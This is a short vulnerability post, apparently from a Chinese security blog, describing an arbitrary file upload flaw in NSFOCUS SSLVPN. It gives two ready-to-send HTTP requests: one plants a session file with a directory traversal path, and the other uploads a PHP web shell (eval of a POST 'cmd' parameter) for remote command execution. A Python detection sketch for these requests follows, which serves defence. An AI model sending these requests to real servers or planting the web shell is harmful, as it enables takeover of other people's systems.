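Vulnerability description:
NSFOCUS SSLVPN has an arbitrary file upload vulnerability. By sending a specially crafted request, an attacker can gain control of the server and execute commands remotely.
Affected products:
NSFOCUS SSLVPN
Network mapping:
The vulnerable port is 8081.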
POST /api/v1/device/bugsInfo HTTP/1.1
Content-Type: multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9
Host:

--1d52ba2a11ad8a915eddab1a0e85acd9
Content-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac71"

lang|s:52:"../../../../../../../../../../../../../../../../tmp/";
--1d52ba2a11ad8a915eddab1a0e85acd9--
POST /api/v1/device/bugsInfo HTTP/1.1
Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef
Host:

--4803b59d015026999b45993b1245f0ef
Content-Disposition: form-data; name="file"; filename="compose.php"

<?php eval($_POST['cmd']);?>
--4803b59d015026999b45993b1245f0ef--
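A detection sketch for the two requests above, as an added example that is not part of the original post: it parses a captured HTTP request and reports the indicators those requests carry (the upload endpoint, a `sess_`-named file, `../` in the uploaded content, a PHP file name or open tag). The function names, the boundary, the host and the sample inputs are constructed for illustration.

```python
import re
from email import message_from_bytes

UPLOAD_PATH = "/api/v1/device/bugsInfo"   # endpoint named in the requests above
PHP_NAME = re.compile(r"\.(php\d?|phtml|phar)$", re.I)

def inspect_upload(raw: bytes) -> list:
    """Return the reasons a raw HTTP request resembles the uploads above."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, _, rest = lines[0].partition(" ")
    target = rest.split(" ")[0].split("?")[0]
    ctype = next((l for l in lines[1:] if l.lower().startswith("content-type:")), "")
    if method != "POST" or target != UPLOAD_PATH or "multipart/form-data" not in ctype.lower():
        return []
    # multipart/form-data uses MIME framing, so the stdlib MIME parser can split it.
    msg = message_from_bytes(ctype.encode("latin-1") + b"\r\n\r\n" + body)
    findings = []
    for part in msg.walk():
        name = part.get_filename()
        if name is None:          # the multipart container itself, or a plain field
            continue
        data = part.get_payload(decode=True) or b""
        if name.startswith("sess_"):
            findings.append(f"{name}: named like a PHP session file")
        if PHP_NAME.search(name):
            findings.append(f"{name}: PHP file extension")
        if b"../" in data or b"..\\" in data:
            findings.append(f"{name}: directory traversal sequence in content")
        if b"<?php" in data.lower() or b"<?=" in data:
            findings.append(f"{name}: PHP open tag in content")
    return findings

def build_request(path: str, filename: str, content: str) -> bytes:
    """Build a constructed sample request (hypothetical host and boundary)."""
    b = "constructedboundary"
    return (f"POST {path} HTTP/1.1\r\nHost: vpn.example\r\n"
            f"Content-Type: multipart/form-data; boundary={b}\r\n\r\n"
            f"--{b}\r\nContent-Disposition: form-data; name=\"file\"; "
            f"filename=\"{filename}\"\r\n\r\n{content}\r\n--{b}--\r\n").encode()

if __name__ == "__main__":
    samples = [("report.txt", "scan results"),                    # constructed, benign
               ("sess_0000constructed", 'lang|s:7:"../tmp/";'),   # constructed
               ("compose.php", "<?php /* constructed */ ?>")]     # constructed
    for fname, content in samples:
        print(fname, inspect_upload(build_request(UPLOAD_PATH, fname, content)))
```

The same checks can be run against requests reconstructed from a reverse proxy or packet capture in front of port 8081.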
From: https://www.cnblogs.com/1zzZ/p/17635728.html